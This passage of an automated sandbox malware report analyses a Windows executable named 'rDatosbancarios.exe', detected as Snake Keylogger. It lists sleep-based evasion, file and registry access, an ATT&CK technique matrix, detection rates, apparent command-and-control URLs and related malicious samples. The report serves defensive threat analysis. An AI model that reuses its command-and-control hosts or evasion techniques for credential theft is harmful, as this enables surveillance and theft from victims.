      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -593985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_0040596F
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_004064C1 FindFirstFileW,FindClose,6_2_004064C1
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_004027FB FindFirstFileW,6_2_004027FB
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599891Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599781Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599672Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599563Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599453Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599344Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599219Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 593985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: rDatosbancarios.exe, 00000006.00000002.2571000085.00000000039AF000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2571000085.0000000003958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI call chain: ExitProcess graph end nodegraph_0-4497
      Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI call chain: ExitProcess graph end nodegraph_0-4499
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Users\user\Desktop\rDatosbancarios.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0
      Source: C:\Users\user\Desktop\rDatosbancarios.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected Snake Keylogger
      Source: Yara matchFile source: 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected Snake Keylogger
      Source: Yara matchFile source: 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Disable or Modify Tools      		LSASS Memory31
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		31
      Virtualization/Sandbox Evasion      		Security Account Manager1
      Application Window Discovery      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Access Token Manipulation      		NTDS1
      System Network Configuration Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Process Injection      		LSA Secrets4
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Deobfuscate/Decode Files or Information      		Cached Domain Credentials214
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
      Obfuscated Files or Information      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      rDatosbancarios.exe45%VirustotalBrowse
      rDatosbancarios.exe42%ReversingLabsWin32.Trojan.SnakeKeylogger
      rDatosbancarios.exe100%AviraHEUR/AGEN.1338065

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsqE012.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://checkip.dyndns.orgxE0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		172.217.16.142
      		truefalse
        		high
        drive.usercontent.google.com
        		172.217.16.193
        		truefalse
          		high
          reallyfreegeoip.org
          		104.21.96.1
          		truefalse
            		high
            checkip.dyndns.com
            		158.101.44.242
            		truefalse
              		high
              checkip.dyndns.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://checkip.dyndns.org/false
                  		high
                  https://reallyfreegeoip.org/xml/8.46.123.189false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://aborters.duckdns.org:8081rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.comrDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://checkip.dyndns.org/jrDatosbancarios.exe, 00000006.00000002.2589949330.0000000036710000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.google.com/rDatosbancarios.exe, 00000006.00000002.2571000085.0000000003958000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://anotherarmy.dns.army:8081rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://reallyfreegeoip.org/xml/8.46.123.189$rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033ECD000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://reallyfreegeoip.orgrDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033EA7000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://checkip.dyndns.orgxErDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://reallyfreegeoip.orgrDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033ECD000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.usercontent.google.com/rDatosbancarios.exe, 00000006.00000003.2311728339.00000000039BA000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2571000085.00000000039AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://checkip.dyndns.orgrDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033ECD000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E79000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F58000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://apis.google.comrDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.comrDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorErrorrDatosbancarios.exefalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://varders.kozow.com:8081rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/crDatosbancarios.exe, 00000006.00000002.2571000085.0000000003958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.com/urDatosbancarios.exe, 00000006.00000003.2311728339.00000000039BA000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2571000085.00000000039AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://reallyfreegeoip.org/xml/rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.21.96.1
                                                        		reallyfreegeoip.orgUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        158.101.44.242
                                                        		checkip.dyndns.comUnited States
                                                        		31898ORACLE-BMC-31898USfalse
                                                        172.217.16.193
                                                        		drive.usercontent.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        172.217.16.142
                                                        		drive.google.comUnited States
                                                        		15169GOOGLEUSfalse

                                                        General Information

                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1634944
                                                        Start date and time:2025-03-11 08:00:26 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 40s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:rDatosbancarios.exe
                                                        Detection:MAL
                                                        Classification:mal96.troj.evad.winEXE@3/21@4/4
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 93%
                                                        • Number of executed functions: 86
                                                        • Number of non-executed functions: 80
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.109.210.53, 150.171.27.10
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target rDatosbancarios.exe, PID 7148 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        03:03:04API Interceptor175x Sleep call for process: rDatosbancarios.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.21.96.1hh01FRs81x.exeGet hashmaliciousFormBookBrowse
                                                        • www.newanthoperso.shop/3nis/?LL=4FHLH&R4lxS2-P=7Jez/f8BRsPhvFRcTYEfxOkzfWBvvrnmo+4qP8uldvbHjjygNPFvdo5E4tKnf+Ij1qWwstrtA/xMUYgdGo9Dw7YPXWw4NGSG4oy32mHU2IUoylmJFg==
                                                        yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                        • www.sigaque.today/n61y/
                                                        A2h6QhZIKx.exeGet hashmaliciousAzorultBrowse
                                                        • k1d5.icu/TP341/index.php
                                                        DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                        • www.rbopisalive.cyou/2dxw/
                                                        r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                                        • www.kdrqcyusevx.info/k7wl/
                                                        MUH030425.exeGet hashmaliciousAzorultBrowse
                                                        • k1d5.icu/TP341/index.php
                                                        Invoice Remittance ref20250226.exeGet hashmaliciousFormBookBrowse
                                                        • www.rbopisalive.cyou/a669/
                                                        368c6e62-b031-5b65-fd43-e7a610184138.emlGet hashmaliciousHTMLPhisherBrowse
                                                        • ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
                                                        PO.exeGet hashmaliciousLokibotBrowse
                                                        • touxzw.ir/sccc/five/fre.php
                                                        OEoRzjI7JgSiUUd.exeGet hashmaliciousLokibotBrowse
                                                        • touxzw.ir/sss2/five/fre.php
                                                        158.101.44.242SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Yl5gNdZgTd.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                        • checkip.dyndns.org/
                                                        gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                        • checkip.dyndns.org/
                                                        2RPs4pieGu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                        • checkip.dyndns.org/
                                                        ZRoD4yRJGi.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • checkip.dyndns.org/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        checkip.dyndns.com4kobC6KGC3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        z101007R1DRG.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        uyqMsPsOG1.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 132.226.8.169
                                                        hKYhCefzJK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        p7wgyD3kbI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        hcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 132.226.247.73
                                                        C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        reallyfreegeoip.org4kobC6KGC3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 104.21.64.1
                                                        SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.16.1
                                                        uyqMsPsOG1.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.48.1
                                                        hKYhCefzJK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 104.21.48.1
                                                        p7wgyD3kbI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 104.21.112.1
                                                        pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.96.1
                                                        hcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.96.1
                                                        fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.64.1
                                                        C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 104.21.112.1
                                                        oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.48.1

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ORACLE-BMC-31898US4kobC6KGC3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        z101007R1DRG.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        hKYhCefzJK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        p7wgyD3kbI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        hcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.6.168
